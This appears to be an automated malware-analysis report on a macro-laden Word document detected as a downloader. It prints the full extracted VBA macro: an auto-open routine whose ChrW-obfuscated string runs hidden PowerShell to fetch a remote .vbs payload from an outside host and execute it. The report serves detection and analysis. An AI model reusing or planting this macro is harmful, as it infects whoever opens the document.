MALICIOUS
266
Risk Score
Heuristics 8
-
ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell (Last) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub Auto_Open() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 4161 bytes |
SHA-256: 0fc4619faee1dd9bb57977ae6850f6af5be09b7f708dad37ac74ad7b20b86701 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "NewMacros" Sub AutoOpen() exec1 = ChrW(113 - 1) + ChrW(112 - 1) + ChrW(120 - 1) + ChrW(102 - 1) + ChrW(115 - 1) + ChrW(116 - 1) + ChrW(105 - 1) + ChrW(102 - 1) + ChrW(109 - 1) + ChrW(109 - 1) + ChrW(47 - 1) exec2 = ChrW(102 - 1) + ChrW(121 - 1) + ChrW(102 - 1) + ChrW(33 - 1) + ChrW(46 - 1) + ChrW(70 - 1) + ChrW(121 - 1) + ChrW(102 - 1) + ChrW(100 - 1) + ChrW(118 - 1) + ChrW(117 - 1) exec3 = ChrW(106 - 1) + ChrW(112 - 1) + ChrW(111 - 1) + ChrW(81 - 1) + ChrW(112 - 1) + ChrW(109 - 1) + ChrW(106 - 1) + ChrW(100 - 1) + ChrW(122 - 1) + ChrW(33 - 1) + ChrW(99 - 1) exec4 = ChrW(122 - 1) + ChrW(113 - 1) + ChrW(98 - 1) + ChrW(116 - 1) + ChrW(116 - 1) + ChrW(33 - 1) + ChrW(46 - 1) + ChrW(111 - 1) + ChrW(112 - 1) + ChrW(113 - 1) + ChrW(115 - 1) exec5 = ChrW(112 - 1) + ChrW(103 - 1) + ChrW(106 - 1) + ChrW(109 - 1) + ChrW(102 - 1) + ChrW(33 - 1) + ChrW(46 - 1) + ChrW(120 - 1) + ChrW(106 - 1) + ChrW(111 - 1) + ChrW(101 - 1) exec6 = ChrW(112 - 1) + ChrW(120 - 1) + ChrW(116 - 1) + ChrW(117 - 1) + ChrW(122 - 1) + ChrW(109 - 1) + ChrW(102 - 1) + ChrW(33 - 1) + ChrW(105 - 1) + ChrW(106 - 1) + ChrW(101 - 1) exec7 = ChrW(101 - 1) + ChrW(102 - 1) + ChrW(111 - 1) + ChrW(33 - 1) + ChrW(41 - 1) + ChrW(111 - 1) + ChrW(102 - 1) + ChrW(120 - 1) + ChrW(46 - 1) + ChrW(112 - 1) + ChrW(99 - 1) exec8 = ChrW(107 - 1) + ChrW(102 - 1) + ChrW(100 - 1) + ChrW(117 - 1) + ChrW(33 - 1) + ChrW(84 - 1) + ChrW(122 - 1) + ChrW(116 - 1) + ChrW(117 - 1) + ChrW(102 - 1) + ChrW(110 - 1) exec9 = ChrW(47 - 1) + ChrW(79 - 1) + ChrW(102 - 1) + ChrW(117 - 1) + ChrW(47 - 1) + ChrW(88 - 1) + ChrW(102 - 1) + ChrW(99 - 1) + ChrW(68 - 1) + ChrW(109 - 1) + ChrW(106 - 1) exec10 = ChrW(102 - 1) + ChrW(111 - 1) + ChrW(117 - 1) + ChrW(42 - 1) + ChrW(47 - 1) + ChrW(69 - 1) + ChrW(112 - 1) + ChrW(120 - 1) + ChrW(111 - 1) + ChrW(109 - 1) + ChrW(112 - 1) exec11 = ChrW(98 - 1) + ChrW(101 - 1) + ChrW(103 - 1) + ChrW(106 - 1) + ChrW(109 - 1) + ChrW(102 - 1) + ChrW(41 - 1) + ChrW(40 - 1) + ChrW(105 - 1) + ChrW(117 - 1) + ChrW(117 - 1) exec12 = ChrW(113 - 1) + ChrW(59 - 1) + ChrW(48 - 1) + ChrW(48 - 1) + ChrW(120 - 1) + ChrW(120 - 1) + ChrW(120 - 1) + ChrW(47 - 1) + ChrW(103 - 1) + ChrW(98 - 1) + ChrW(116 - 1) exec13 = ChrW(117 - 1) + ChrW(46 - 1) + ChrW(100 - 1) + ChrW(98 - 1) + ChrW(115 - 1) + ChrW(104 - 1) + ChrW(112 - 1) + ChrW(47 - 1) + ChrW(100 - 1) + ChrW(112 - 1) + ChrW(110 - 1) exec14 = ChrW(48 - 1) + ChrW(106 - 1) + ChrW(110 - 1) + ChrW(98 - 1) + ChrW(104 - 1) + ChrW(102 - 1) + ChrW(116 - 1) + ChrW(48 - 1) + ChrW(103 - 1) + ChrW(106 - 1) + ChrW(109 - 1) exec15 = ChrW(102 - 1) + ChrW(48 - 1) + ChrW(119 - 1) + ChrW(99 - 1) + ChrW(48 - 1) + ChrW(113 - 1) + ChrW(116 - 1) + ChrW(47 - 1) + ChrW(119 - 1) + ChrW(99 - 1) + ChrW(116 - 1) exec16 = ChrW(40 - 1) + ChrW(45 - 1) + ChrW(40 - 1) + ChrW(74 - 1) + ChrW(110 - 1) + ChrW(113 - 1) + ChrW(112 - 1) + ChrW(115 - 1) + ChrW(117 - 1) + ChrW(98 - 1) + ChrW(111 - 1) exec17 = ChrW(117 - 1) + ChrW(101 - 1) + ChrW(112 - 1) + ChrW(100 - 1) + ChrW(47 - 1) + ChrW(119 - 1) + ChrW(99 - 1) + ChrW(116 - 1) + ChrW(40 - 1) + ChrW(42 - 1) + ChrW(60 - 1) exec18 = ChrW(33 - 1) + ChrW(74 - 1) + ChrW(111 - 1) + ChrW(119 - 1) + ChrW(112 - 1) + ChrW(108 - 1) + ChrW(102 - 1) + ChrW(46 - 1) + ChrW(74 - 1) + ChrW(117 - 1) + ChrW(102 - 1) exec19 = ChrW(110 - 1) + ChrW(33 - 1) + ChrW(74 - 1) + ChrW(110 - 1) + ChrW(113 - 1) + ChrW(112 - 1) + ChrW(115 - 1) + ChrW(117 - 1) + ChrW(98 - 1) + ChrW(111 - 1) + ChrW(117 - 1) exec20 = ChrW(101 - 1) + ChrW(112 - 1) + ChrW(100 - 1) + ChrW(47 - 1) + ChrW(119 - 1) + ChrW(99 - 1) + ChrW(116 - 1) Last = exec0 + exec1 + exec2 + exec3 + exec4 + exec5 + exec6 + exec7 + exec8 + exec9 + exec10 + exec11 + exec12 + exec13 + exec14 + exec15 + exec16 + exec17 + exec18 + exec19 + exec20 Shell (Last) End Sub Sub Auto_Open() AutoOpen End Sub Sub Workbook_Open() AutoOpen End Sub |
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 16384 bytes |
SHA-256: a1b8ab42b701e21fd969fa446f8463bffd4c07378f208bc19335be26cea54271 |
|||
|
Detection
ClamAV:
Doc.Downloader.Generic-6698421-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.